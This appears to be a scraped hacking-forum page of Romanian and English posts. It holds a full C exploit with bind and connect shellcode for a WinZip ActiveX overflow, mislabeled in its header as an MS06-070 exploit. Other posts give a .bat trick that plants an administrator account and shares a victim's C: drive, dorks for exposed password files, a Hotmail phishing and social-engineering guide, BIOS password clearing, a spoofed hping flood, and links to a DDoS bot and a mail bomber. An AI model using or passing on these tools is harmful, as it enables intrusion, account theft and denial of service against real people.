zbeng

more info : -->http://research.eeye.com/html/advisories/published/AD20061114.html see the other topic for the code, this is the compiled version http://rapidshare.com/files/3585145/ms06070.rar.html http://share.urbanfriends.us/savefile_php/uploads/afee542728.rar Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit *-*-*-*-*-* rInG04h love ??¨[sherry] *-*-*-*-*-* Compiler by rInG04h Dirshell.Com [code]usage: ms06070 targetip DomainName ------------------Eviloctal Security Team----------------------- [url]Http://forum.eviloctal.com[/url] rInG04h[est] _________________ for i am teh x0r h4xx0ring 24/7

#include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> #include <getopt.h> #define NOPSIZE 999999 struct target { char* name; int retaddr; }; struct shellcode { char* name; short port; int host; char* shellcode; }; int targetno = 1; struct target targets[] = { {"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269} /* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */ }; int shellno = 2; struct shellcode shellcodes[] = { {"Win32 x86 bind() shellcode (4444/tcp default)",162,-1, "x48x40xf5x49xd6x4axf9x91x47x96x2fxf8x9bx37x41xf5" "x99x47xf9xf9xfcxf9x48x4ex4bx9bx90x9bxf5x97x40xf9" "xd6x41xf9x48x9bx92xfdx9bx49x42x4fx9fx90xd6x27x9b" "x93x46x2fx90xfdx4ax6ax51x59xd9xeexd9x74x24xf4x5b" "x81x73x13xbcxe8x2bx27x83xebxfcxe2xf4x3dx2cx7fxd5" "x43x17xd7x4dx57xa5xc3xdex43x17xd4x47x37x84x0fx03" "x37xadx17xacxc0xedx53x26x53x63x64x3fx37xb7x0bx26" "x57xa1xa0x13x37xe9xc5x16x7cx71x87xa3x7cx9cx2cxe6" "x76xe5x2axe5x57x1cx10x73x98xc0x5exc2x37xb7x0fx26" "x57x8exa0x2bxf7x63x74x3bxbdx03x28x0bx37x61x47x03" "xa0x89xe8x16x67x8cxa0x64x8cx63x6bx2bx37x98x37x8a" "x37xa8x23x79xd4x66x65x29x50xb8xd4xf1xdaxbbx4dx4f" "x8fxdax43x50xcfxdax74x73x43x38x43xecx51x14x10x77" "x43x3ex74xaex59x8exaaxcaxb4xeax7ex4dxbex17xfbx4f" "x65xe1xdex8axebx17xfdx74xefxbbx78x74xffxbbx68x74" "x43x38x4dx4fxadxb4x4dx74x35x09xbex4fx18xf2x5bxe0" "xebx17xfdx4dxacxb9x7exd8x6cx80x8fx8ax92x01x7cxd8" "x6axbbx7exd8x6cx80xcex6ex3axa1x7cxd8x6axb8x7fx73" "xe9x17xfbxb4xd4x0fx52xe1xc5xbfxd4xf1xe9x17xfbx41" "xd6x8cx4dx4fxdfx85xa2xc2xd6xb8x72x0ex70x61xccx4d" "xf8x61xc9x16x7cx1bx81xd9xfexc5xd5x65x90x7bxa6x5d" "x84x43x80x8cxd4x9axd5x94xaax17x5ex63x43x3ex70x70" "xeexb9x7ax76xd6xe9x7ax76xe9xb9xd4xf7xd4x45xf2x22" "x72xbbxd4xf1xd6x17xd4x10x43x38xa0x70x40x6bxefx43" "x43x3ex79xd8x6cx80x55xffx5ex9bx78xd8x6ax17xfbx27"}, {"Win32 x86 connect() shellcode (4444/tcp default)",167,160, "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45" "x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49" "x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d" "x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66" "x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61" "xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40" "x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32" "x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6" "x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09" "xf5xadx57xffxd6x53x53x53x53x43x53x43x53xffxd0x68" "x01x02x03x04x66x68x11x5cx66x53x89xe1x95x68xecxf9" "xaax60x57xffxd6x6ax10x51x55xffxd0x66x6ax64x66x68" "x63x6dx6ax50x59x29xccx89xe7x6ax44x89xe2x31xc0xf3" "xaax95x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxab" "x68x72xfexb3x16xffx75x28xffxd6x5bx57x52x51x51x51" "x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53xffxd6" "x6axffxffx37xffxd0x68xe7x79xc6x79xffx75x04xffxd6" "xffx77xfcxffxd0x68xf0x8ax04x5fx53xffxd6xffxd0"} }; char html1[]="<HTML>rn<HEAD>rn<TITLE></TITLE>rn</HEAD>rn" "<BODY>rn<SCRIPT LANGUAGE="VBScript">rnSub WZ" "FILEVIEW_OnAfterItemAdd(Item)rnWZFILEVIEW.FilePa" "ttern = ""; /* smash the stack here */ char html2[]=""rnend subrn</SCRIPT>rnrn<OBJECT ID="WZFILEV" "IEW" WIDTH=200 HEIGHT=200rnCLASSID="CLSID:A09A" "E68F-B14D-43ED-B713-BA413F034904">rn</OBJECT>r" "n</BODY>rn</HTML>rn"; char bmphdr[]="x42x4dx3exbbx2dx00x00x00x00x00x36x00x00" "x00x28x00x00x00xe7x03x00x00xe7x03x00x00" "x01x00x18x00x00x00x00x00x08xbbx2dx00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00"; int ret; void help(char* progname){ int count; printf("[ Usage instructions.n[n"); printf("[ %s <required> (optional)n[n[ --filename|-f <file.html>n",progname); printf("[ --imgname|-i <image.bmp>n[ --shellcode|-s <shell#>n"); printf("[ --shellport|-p (port)n"); printf("[ --shellhost|-i (ip)n"); printf("[ --target|-t <target#/0xretaddr>n[n"); printf("[ Target#'sn"); for(count = 0;count <= targetno - 1;count++){ printf("[ %d %s 0x%xn",count,targets[count],targets[count]); } printf("[n[ Shellcode#'sn"); for(count = 0;count <= shellno - 1;count++){ printf("[ %d "%s" (length %d bytes)n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode)); } exit(0); } void setret(char* retarg){ int value = atoi(retarg); switch(value){ case 0: printf("[ Using target '%s'n",targets[ret].name); ret = targets[ret].retaddr; break; default: ret = strtoul(retarg,NULL,16); printf("[ Using return address '0x%x'n",ret); break; } } int main(int argc, char* argv[]){ unsigned long i, fd; int c, index, payg, paya, lhost; short shellport, shellport2; int ishell = 0, itarg = 0; char *buffer, *file, *img, *payload; static struct option options[] = { {"filename", 1, 0, 'f'}, {"imgname", 1, 0, 'i'}, {"target", 1, 0, 't'}, {"shellcode", 1, 0, 's'}, {"shellport", 1, 0, 'p'}, {"shellhost", 1, 0, 'd'}, {"help", 0, 0,'h'} }; printf("[ WinZip <= 10.0.7245 FileView ActiveX overflow exploitn"); while(c != -1){ c = getopt_long(argc,argv,"f:i:t:s:p:D:h",options,&index); switch©{ case 'f': file = optarg; break; case 'i': img = optarg; break; case 't': itarg = 1; setret(optarg); if(strlen((char*)&ret) < 4){ fprintf(stderr,"[ Selected target contains a null address!n"); exit(-1); } break; case 's': if(ishell==0){ payg = atoi(optarg); switch(payg){ case 0: printf("[ Using shellcode '%s' (%d bytes)n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); payload = malloc(strlen(shellcodes[payg].shellcode)+1); memset(payload,0,strlen(shellcodes[payg].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); shellport2 = 4444; ishell = 1; break; case 1: printf("[ Using shellcode '%s' (%d bytes)n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); payload = malloc(strlen(shellcodes[payg].shellcode)+1); memset(payload,0,strlen(shellcodes[payg].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); shellport2 = 4444; ishell = 1; break; default: printf("[ Invalid shellcode selection %dn",payg); exit(0); break; } } break; case 'p': if(ishell==1){ if(shellcodes[payg].port > -1){ paya = strlen(payload); shellport = atoi(optarg); shellport2 = shellport; shellport =(shellport&0xff)<<8 | shellport>>8; memcpy((void*)&payload[shellcodes[payg].port],&shellport,sizeof(shellport)); if(paya > strlen(payload)) { printf("[ Error shellcode port introduces null bytesn"); exit(1); } printf("[ Shellcode port changed to '%u'n",atoi(optarg)); } else{ printf("[ (%s) port selection is ignored for current shellcoden",optarg); } } else{ printf("[ No shellcode selected yet, ignoring (%s) port selectionn",optarg); } break; case 'd': if(ishell==1){ if(shellcodes[payg].host > -1){ paya = strlen(payload); lhost = inet_addr(optarg); memcpy((void*)&payload[shellcodes[payg].host],&lhost,sizeof(lhost)); if(paya > strlen(payload)){ printf("[ Error shellhost introduces null bytesn"); exit(1); } printf("[ Shellhost has been changed to '%s'n",optarg); } else{ printf("[ (%s) shellhost selection is ignored for current shellcoden",optarg); } } else { printf("[ No shellcode selected yet, ignoring (%s) shellhost selectionn",optarg); } break; case 'h': help(argv[0]); break; default: break; } } if(ishell==0||itarg==0||strlen(file)==0||strlen(img)==0){ printf("[ Error insufficient arguements, try running '%s --help'n",argv[0]); exit(0); } // create image printf("[ Creating image containing shellcode '%s'n",img); fd = open(img,O_RDWR|O_CREAT,S_IRWXU); if(fd == -1){ fprintf(stderr,"[ Error creating %sn",file); exit(-1); } write(fd,bmphdr,sizeof(bmphdr)); for(i = 0;i < NOPSIZE;i++){ write(fd,"x90",1); } write(fd,payload,strlen(payload)); close(fd); // create html printf("[ Creating html exploit page '%s'n",file); fd = open(file,O_RDWR|O_CREAT,S_IRWXU); if(fd == -1){ fprintf(stderr,"[ Error creating %sn",file); exit(-1); } write(fd,html1,strlen(html1)); for(i = 0;i < 265;i++){ write(fd,"A",1); } write(fd,&ret,4); for(i = 0;i < 1827;i++){ write(fd,"A",1); } write(fd,html2,strlen(html2)); write(fd,img,strlen(img)); write(fd,html3,strlen(html3)); close(fd); } // milw0rm.com [2006-11-15]

Fine ddos bot with help of web-shells. download: http://rapidshare.com/files/3510544/ddos_script_by_Zbeng__.php__.rar.html http://share.urbanfriends.us/savefile_php/uploads/b136935fc5.rar

ftp full of usefull software (are vista linux....) vedeti voi ftp://ftp.freenet.de/pub/filepilot/

http://rapidshare.com/files/3508174/Mail_Bomber_1.00.rar.html http://share.urbanfriends.us/savefile_php/uploads/40080c0ab2.rar

bine ai venit;9

kwe ce nai zis hai ca vin si eu...sau poate dai o vizita pe la madrid;))

si merge tot de minune;)

in sfarsit un post serios....chiar ai o "meserie" buna pentru calculatuarele tale...

ms chiar ma interesa punctu 1 si 5.

http://rapidshare.com/files/3477969/SCD___binder___1.0.rar.html http://share.urbanfriends.us/savefile_php/uploads/9a327557ea.rar 65 KB

acest post este in scop educativ

'>http://urbanfriends.us/zbeng/www/asa%20o%20fi.html le gasiti acolo;)

This video shows how to exploit file sharing. DOWNLOAD http://rapidshare.com/files/3459576/20_netbios.rar.html http://share.urbanfriends.us/savefile_php/uploads/dc1aab37e9.rar

-Bazics- Opening a dos prompt -> Go to start and then execute and write cmd and press ok Now insert this command: net And you will get something like this NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION | SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ] Ok in this tutorial we well use 3 of the commands listed here they are: net user , net share and net send We will select some of those commands and put them on a .bat file. What is a .bat file? Bat file is a piece of text that windows will execute as commands. Open notepad and whrite there: dir pause And now save this as test.bat and execute it. Funny aint it ? ---------------------- Starting ------------------- -:Server:- The plan here is to share the C: drive and make a new user with administrators access Step one -> Open a dos prompt and a notebook The dos prompt will help you to test if the commands are ok and the notebook will be used to make the .bat file. Command n 1-> net user neo /add What does this do? It makes a new user called neo you can put any name you whant Command n 2-> net localgroup administrators neo /add This is the command that make your user go to the administrators group. Depending on the windows version the name will be different. If you got an american version the name for the group is Administrators and for the portuguese version is administradores so it's nice yo know wich version of windows xp you are going to try share. Command n 3->net share system=C: /unlimited This commands share the C: drive with the name of system. Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend. -!extras!- Command n 4-> net send urip I am ur server Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your computer and you can check the victim ip. ->To see your ip in the dos prompt put this command: ipconfig -----------------------: Client :---------------- Now that your friend opened your .bat file her system have the C: drive shared and a new administrator user. First we need to make a session with the remote computer with the net use command , you will execute these commands from your dos prompt. Command n 1 -> net use \victimip neo This command will make a session between you and the victim Of course where it says victimip you will insert the victim ip. Command n 2-> explorer \victimipsystem And this will open a explorer windows in the share system wich is the C: drive with administrators access! SIMPLU SI FOLOSITOR;)

1)"Index of /admin" 2)"Index of /password" 3)"Index of /mail" 4)"Index of /" +banques +filetype:@ls (for france...) 5)"Index of /" +passwd 6)"Index of /" password.txt And you can continue as long as your imaginatio is active. For example of my results, I saw great informations from the central banks of Luxemboug and Switzerland, could admin a SQL server, ... So, I don't know if it is a great technical bug, but I know about hacking and security (I would like to be a security consultant later..) (and I am looking for a training in security in a foreign country like US or England...) and even if we don't get root access immediatly, it is a great step for social engineering and spying.

Download: http://depositfiles.com/files/373416

466 True Type Fonts and 72 OpenType Fonts Size: 16.5 MB Download: http://rapidshare.com/files/3354830/bestF.rar

Template Monster 10780 Wordpress Theme | 2.7 Mb Download: Code: http://rapidshare.com/files/3351363/temp107.rar

o intrebar tu te ai uitat la site-ul principal urbanfriends;)

NASA Department website Hacked. DOWNLOAD http://rapidshare.com/files/3344479/92_meh.zip.html

tutorialu comlet il puteti vedea aici: '>http://urbanfriends.us/zbeng/www/index.php.htm

This file will guide you follwing: 1:- How to hack hotmail with fake login screen (2 different ways) 2:- How to send fake e-mails to any one 3:- How to detect a fake message into hotmail 4:- How to get persons ip addrress through msn messenger 5:- How to fool ur victim and get his pass 6:- Easiest Way 7:- Change msn messenger title 8:- How to send viruses to hotmail 1st:- How to hack hotmail with fake login screen 1st Way:- Upload your hotmail`s fake login screen on a webserver and if you then send these codes to your victim from yahoo or another mail sending program.The codes are <script> location.href="http://www.yoursite.com/yourhotmailfakepage.html/" </script> and the user will be automatically redirected to your fake hotmail screen from their e-mail box & you r done. Note: replace the website and page name but donot forget to put /" in the end of link. 2nd way:- Start chatting with ur victim and send him the fake login screen through ur messenger and done. Note For fast recieving: In order for u to recieve pass as fast as victim types it then in my prog where it says your user name plz type your e-mail address which doesnot belong to hotmail & yahoo. 2nd:- How to send fake e-mails to any one. This is very easy go to http://www.boxfrog.com/ register there and when u r in ur members area click on create message and in from filed type in any ones e-mail address and the message will be sent. 3rd:- How to detect a fake message into hotmail. This is also very easy open ur e-mail box go to opetions select display setting or message display setting or(some thing like this) now select full where it says message display settings or something like this.Open the mail which u thought to be fake now in the last where it says from u can see the address of that site from where the mail is sent but if some one has sent it through some sort of prog it will tell u his ip. 4th:- How to get persons ip addrress through msn messenger. Open ur messenger start chatting with ur victim open ms dos and type netstat -n there but donot press enter and then minimize it after this send something to ur victim and as soon as he accept it the hotmail messenger will say connecting this is the time when u re maximize ur msdos and press enter the ip address next to time_wait: will the victims ip.Hack him,Nuke him, do any thing you want but i will not be responsible for any serious work. 5th:- How to fool ur victim and get his pass This is as easy as a chicken lays an egg.[joke] create a fake e-mail address and like [mail]cgi_7t86_server@hotmail.comThis[/mail] email address is being protected from spam bots, you need Javascript enabled to view it This email address is being protected from spam bots, you need Javascript enabled to view it and then go to compose and then ask ur victim in message body (this is hotmail automated bot of msn. Our hotmail was attacked by hackers to verify that they have not disturbed your password plz mail us your password with user name or your account will be cancled with in 10 days and try to forward this message to all of your friends on hotmail. Regards Hotmail automated bot Metro) This will fool your victim and he will send pass to you easy na. 6th:- Now the easiest way go to hotmail.com type ur victims e-mail address in and try to guess password coz hackers must have good guessing power. Go to hotmail.com click on forgot password type victims e-mail address in and all the things you need there after that try to guess his secret answer if u u can change his pass. 7th:- Try to use a soft which changes msn title on chatting window replace it with the which currently is (never give out your msn password or credit card number) change it to (plz type your msn password below to start the conversation because for security reasons your password will not be visible to the person who you talking with) this will also fool your victim.You can find such soft at 8th:-'>http://www.mess.be/ 8th:- How to send viruses to hotmail It is easy send the victim an e-mail with virus attachment using boxfrog.com and in from field type any hotmail address easy. Comments & suggestions should be mailed to [mail]ppa9@boxfrog.comThis[/mail] email address is being protected from spam bots, you need Javascript enabled to view it This email address is being protected from spam bots, you need Javascript enabled to view it but no junk mail plz (like u did last time) Note: Donot use sample fake login screen thats what every one is doing and i have recievd 400 peoples passwords plz create new fake login screens by fake login screen creator. By tristar

This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following: Get DOS prompt and type: DEBUG hit enter -o 70 2e hit enter -o 71 ff hit enter -q hit enter exit hit enter Restart the computer. It works on most versions of the AWARD BIOS. Basic BIOS password crack - works 9.9 times out of ten This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following: Get DOS prompt and type: DEBUG hit enter -o 70 2e hit enter -o 71 ff hit enter -q hit enter exit hit enter Restart the computer. It works on most versions of the AWARD BIOS. Accessing information on the hard disk When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk. Standard BIOS backdoor passwords The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer's backdoor passwords: AWARD BIOS AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %

We all know hping as a network scanning tool and analyzer. In this article I use it as a DOS tool…pretty simple. First off open tcpdump so you can monitor what is going on. Then I format the command for the attack which looks like this: exploit2:/Users/sting3r root# hping2 -a 192.168.2.126 -S 192.168.2.115 -p 80 -i u10000 In the command youll notice the -a switch which is used to spoof the source address. My curent IP at the time of the attack was 192.168.2.192. This also eliminates the possibility of getting the RST packet from the targeted host. The -i switch dictates the packet interval. Now understand you will not see an of the return traffic to your machine because of the -a spoof source switch. In the screen shot you can see the traffic between the spoofed source and the target….this is a pretty basic attack and can be mitigated.